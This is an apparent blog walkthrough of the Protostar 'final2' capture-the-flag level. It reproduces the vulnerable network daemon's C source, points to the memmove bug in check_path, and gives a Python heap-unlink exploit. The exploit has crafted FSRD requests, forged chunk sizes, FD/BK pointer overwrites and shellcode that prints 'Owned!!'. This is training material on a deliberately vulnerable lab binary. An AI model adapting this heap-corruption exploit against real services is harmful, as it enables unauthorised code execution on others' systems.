Today In This post, I am going to share with you my walk through experience of Exploit Exercise Proto Star Final2 Level.
let's Start
Source Codes
#include "../common/common.c"
#include "../common/malloc.c"
#define NAME "final2"
#define UID 0
#define GID 0
#define PORT 2993
#define REQSZ 128
void check_path(char *buf)
{
char *start;
char *p;
int l;
/*
* Work out old software bug
*/
p = rindex(buf, '/');
l = strlen(p);
if(p) {
start = strstr(buf, "ROOT");
if(start) {
while(*start != '/') start--;
memmove(start, p, l);
printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
"yes" : "no", start - buf);
}
}
}
int get_requests(int fd)
{
char *buf;
char *destroylist[256];
int dll;
int i;
dll = 0;
while(1) {
if(dll >= 255) break;
buf = calloc(REQSZ, 1);
if(read(fd, buf, REQSZ) != REQSZ) break;
if(strncmp(buf, "FSRD", 4) != 0) break;
check_path(buf + 4);
dll++;
}
for(i = 0; i < dll; i++) {
write(fd, "Process OK\n", strlen("Process OK\n"));
free(destroylist[i]);
}
}
int main(int argc, char **argv, char **envp)
{
int fd;
char *username;
/* Run the process as a daemon */
background_process(NAME, UID, GID);
/* Wait for socket activity and return */
fd = serve_forever(PORT);
/* Set the client socket to STDIN, STDOUT, and STDERR */
set_io(fd);
get_requests(fd);
}
Hint
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
Vulnerable Function
/*
* Work out old software bug
*/
p = rindex(buf, '/');
l = strlen(p);
if(p) {
start = strstr(buf, "ROOT");
if(start) {
while(*start != '/') start--;
memmove(start, p, l);
printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
"yes" : "no", start - buf);
}
Planing
Well, Solving This Challenge was really very fun and amazing. As we can see, No need to find vulnerable function and if you have done, heap levels honestly then this level is just a piece of cake.
Nothing more!
Exploit
import struct
import socket
# Total Buff 128
# ==========================================
# | Buff(128) | -8(4) | -4 | FD | BR |
# ==========================================
# First Buff
payload = 'FSRDBBBB'
# push 0x804e0ae
# ret
payload+= '\xB8\x98\xE0\x04\x08\xFF\xE0'
# '\xB8\xB2\xE0\x04\x08\xFF\xE0'
# '\xB8\xAE\xE0\x04\x08\xFF\xE0'
# '\x68\xAE\xE0\x04\x08\xC3' # Limited size (8 bytes)Shellcode
payload+= 'B'*(128-len(payload)-1)
payload+= '/'
payload1 = payload
# Second Payload
payload = 'FSRD'
payload+= 'ROOT'
payload+= '\x90'*4
payload+= '/'
payload+= struct.pack("i", -8)
payload+= struct.pack("i", -4)
payload+= struct.pack("i",0x0804d41c-12) # FD
payload+= struct.pack('I', 0x804e010) # Bk
"""
0: 31 c0 xor eax,eax
2: 31 db xor ebx,ebx
4: 31 c9 xor ecx,ecx
6: 31 d2 xor edx,edx
8: b0 04 mov al,0x4
a: b3 01 mov bl,0x1
c: 68 64 21 21 21 push 0x21212164
11: 68 4f 77 6e 65 push 0x656e774f
16: 89 e1 mov ecx,esp
18: b2 08 mov dl,0x8
1a: cd 80 int 0x80
1c: b0 01 mov al,0x1
1e: 31 db xor ebx,ebx
20: cd 80 int 0x80
"""
shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x64\x21\x21\x21\x68\x4f\x77\x6e\x65\x89\xe1\xb2\x08\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
payload+= '\xeb\x0f'
payload+= '\x90'*20 # 90-bytes Shellcode here
payload+= shellcode
payload+= '\xcc'*(128-len(payload))
print payload1+payload
For More Detailed Walk through Check Below Provided YouTube Video Playlist